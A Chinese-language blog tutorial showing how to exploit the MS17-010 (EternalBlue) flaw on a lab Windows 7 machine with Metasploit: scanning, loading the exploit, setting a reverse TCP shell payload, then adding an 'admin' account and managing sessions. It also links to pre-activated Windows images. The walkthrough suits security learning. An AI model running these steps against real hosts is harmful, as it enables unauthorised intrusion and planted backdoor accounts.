写点什么

网络安全 kali 渗透学习 web 渗透入门 使用 msf 渗透攻击 Win7 主机并远程执行命令

作者:学神来啦
  • 2022 年 3 月 01 日
  • 本文字数:1975 字

    阅读完需:约 6 分钟

环境介绍

永恒之蓝概述:


永恒之蓝是指 2017 年 4 月 14 日晚,黑客团体 ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。


官方描述:


永恒之蓝相关病毒,其实是利用了微软的 MS17-010 漏洞。MS17-010 是 Windows 系统一个底层服务的漏洞,恶意代码会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。


视频版↓:网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通


文字版↓:做过的实战项目-内网实战靶场环境-渗透工具”还有很多渗透思维图谱!

通过 msf 模块获取 Win7 主机远程 shell

Win7 旗舰版 SP1-64 位系统镜像(内有激活工具):链接:https://pan.baidu.com/s/1FueCa5Z9WUBbOWvL-Djwqw提取码:root


Win7 旗舰版 SP1-64 位免安装版(已激活)密码:123456,下载解压后用 VMware 直接打开即可链接:https://pan.baidu.com/s/1vlHNmdHBiPoidRmP5H7sHw提取码:4g96


如果想自己安装可以下载镜像,不想自己安装的可以下载免安装版


模块的整体使用流程如下



我们先扫描目标是否存在 ms17-010 漏洞


msf6 > search ms17-010
复制代码



使用 use 命令选中这个模块


msf6 > use auxiliary/scanner/smb/smb_ms17_010
复制代码


查看模块需要配置的信息


msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
复制代码



需要我们配置RHOST主机IP
复制代码


msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.56
复制代码


开始扫描


msf6 auxiliary(scanner/smb/smb_ms17_010) > run
复制代码



目标看起来易受攻击,也就表示可能存在相关漏洞。


查找攻击模块


msf6 > search ms17-010
复制代码



使用 use 命令加载模块


msf6 > use exploit/windows/smb/ms17_010_eternalbluemsf6 exploit(windows/smb/ms17_010_eternalblue) > show options
复制代码



设置目标主机 IP


msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.56
复制代码


查看 exploit target 目标类型:


msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets
复制代码



可以看到这个模块只有一个 target,所以默认就选择这个目标系统。不需要手动设置。


我们已经配置好漏洞相关参数了,接下来应该做什么?



找一个 payload,获取 shell 远程连接权限后,进行远程执行命令,由于模块加载的时候默认指定了一个 payload



如果不想使用默认指定的 payload,可以自己找一个 payload


msf6 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell type:payload
复制代码


注:payload 又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回 shell,也可以进行程序注入等。


我们挑选一个反弹 shell 的 payloads



注:设置的时候 payload 和 windows 之间有空格。


msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
复制代码


查看一下 payloads 需要配置什么信息


msf6 exploit(windows/smb/ms17_010_eternalblue) > show options  #查看加载到的payload信息
复制代码



设置一下本机 payload 监听地址


msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.53
复制代码


配置完成后开始执行


exploit  [ɪkˈsplɔɪt  运用;利用; msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
复制代码



注:如果等待没有出现 shell 提示符可以敲一下回车。直接执行的话会获得目标主机的 SEHLL 使用 DOS 命令创建用户


C:\Windows\system32>net user admin admin /add 
复制代码



显示乱码但是已经添加成功拓展:解决乱码问题(乱码是因为 windows 和 linux 的编码不一样导致的)


C:\Windows\system32>chcp 65001
复制代码


查看用户


C:\Windows\system32>net user
复制代码



可以看到新建的用户已经创建成功。查看拿到的用户权限


C:\Windows\system32>whoami
复制代码



关闭链接 Ctrl+c


Abort session 1? [y/N]  y
复制代码


实战:通过会话进行连接目标机


msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j 
复制代码


-j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机。



msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions
复制代码



通过会话 Id 进入会话


msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2
复制代码



退出会话将会话保存到后台


C:\Windows\system32>background
复制代码



msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions 
复制代码



根据会话 Id 结束会话


msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2
复制代码



总结使用 metasploit 攻击的步骤:1、查找 CVE 公布的漏洞 2、查找对应的 exploit 模块 3、配置模块参数 4、添加 payload 后门 5、执行 exploit 开始攻击


今天的分享就到这里,需要配套资料的找小编



用户头像

学神来啦

关注

还未添加个人签名 2021.06.02 加入

10年Linux使用及管理经验,7年IT在线教育培训经验。精通Linux、Python、思科、C++、安全渗透等技术。曾任职国内知名互联网公司高级运维架构师、运维总监。对基于Linux下开源程序Openstack、Docker、K8S、DevOps、

评论

发布
暂无评论
网络安全kali渗透学习 web渗透入门 使用msf渗透攻击Win7主机并远程执行命令_网络安全_学神来啦_InfoQ写作平台